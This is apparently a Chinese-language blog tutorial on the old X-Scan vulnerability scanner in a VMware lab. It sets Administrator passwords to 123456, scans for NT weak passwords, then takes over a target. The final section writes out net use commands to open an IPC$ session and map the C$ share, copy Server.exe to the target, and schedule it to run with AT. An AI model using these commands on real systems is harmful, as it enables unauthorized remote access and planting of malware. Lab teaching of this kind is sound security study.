x-scanf基本使用教程

x-scanf基本使用教程

2020-04-07 by 夢兮Q

1、實驗準備

0.實驗原理

• x-scanf已是好久維護了，最後更新時在2005年，在軟件考試界面中做者寫的很明白：「理論上可運行於Windows NT系列操做系統，推薦運行於Windows 2000以上的Server版Windows系統。'',可是，我屢次實驗證實，在win 7系統上掃描時，體驗極差，各類掃描不出來和軟件崩潰。
• 屢次實驗後，我我的以爲在win server 2003 體驗是最佳的。
• 還有，我在實驗中發現，x-scanf只能掃描出管理員帳戶的弱密碼（Administrator）。
• 能掃描出弱密碼的緣由是，通常的windows系統卻是NT server系統（Windows NT Server），爲了經過網絡方便遠程管理和共享等。而，能有最高權限操做的只有Administrator帳戶，其餘帳戶的弱密碼掃描不到。（可能也是由於沒有加入共享組的緣由吧，我沒具體實驗過。）
• 軟件下載傳送門

連接： https://pan.baidu.com/s/1IwT3...
提取碼：9yhz
複製這段內容後打開百度網盤手機App，操做更方便哦

1.實驗拓步

本實驗中使用的VMware15虛擬機。

• 一臺windows server 2003當作掃描的服務器，用於運行x-scanf掃描工具。
• 一臺win7和一臺win xp 模擬被掃描的主機，開啓管理員帳戶，並設置一個建議的密碼：123456，模擬注意設置了不安全的弱密碼。
• 將全部虛擬機綁定在同一塊虛擬網卡（VMNet10）上，模擬全部主機處於同一局域網。

2.如何將全部虛擬機綁定到同一區域網中？

（1）打開虛擬網絡編輯器

（2）建立一個虛擬網絡

• VMnet +數字標識，標識了一個虛擬機局域網。
• 選擇以後，默認類型是僅主機模式就好了，該模式中你的本地電腦和虛擬機都在同一私有區域網絡。

（3）將虛擬機綁定到同一虛擬網絡中，這裏我給全部虛擬機綁定的是VMnet10。

3.如何開啓windows系統管理員帳戶?

小技巧：

• window server開機後 ，按Ctrl+Alt+Insert 進入系統就不會鎖屏了。

（1）右鍵個人電腦，選擇管理。打開計算機管理。

（2）啓用管理員帳戶

（3）打開控制面板，按照下面的路徑，找到Administrator帳戶，並更改密碼。

這裏我更改的密碼爲：123456

2、開始掃描系統漏洞

1. 配置掃描參數

打開x-scanf v3.3. GUI.

（1）檢測範圍

（1）掃描模塊

模塊功能很豐富，可是本次實驗咱們主要掃描NT-Server弱口令。

（3）其餘設置（重要）

再虛擬環境中，可能會由於某些緣由，掃描進程會跳過，因此要選擇 無條件掃描

2.開始掃描

• 掃描完成後，會自動彈出html版的掃描報告。

3.提取信息

(1)經過實時掃描結果

（2）經過掃描報告獲取詳細和統計信息。

查看 》 檢查報告

能夠點擊切換報告的查看類型 HTML、TXT、XML。

HTML：就是網頁版本

TXT：記事本文檔

XML：可擴展標記語言，將白了，通常是web配置文件的類型。

3、使用掃描到弱密碼，操控主機

這裏使用net 命令行的方式鏈接

1. 鏈接對方

   必需以管理員身份打開，進入CMD/Powershell.

   注意空格

   192.168.100.131：對方IP地址

   123456：爲密碼

   administrator：用戶名

   net use \\\\192.168.100.131\\ipc$ "123456" /user:"administrator"

2. 映射對方的磁盤到個人電腦

   net use Y: \\\\192.168.100.131\\C$  
   //這裏時將對方的C盤，映射成個人電腦下的Y盤

3. 向對方複製文件。

   若是能夠的話，建議使用資源管理器，把文件複製到Y盤就好了

   copy C:\\Server.exe  \\\\192.168.100.131\\C$  
   //複製我C盤下的‘Server.exe’文件到對方電腦的C盤根目錄下

4. 讓對方電腦自動執行軟件。

   就是給對方電腦發送一些工做指令

   AT \\\\192.168.100.131 22:29 c:\\Server.exe  
   //對方電腦在在22:29運行程序C盤根目錄下的Server.exe程序。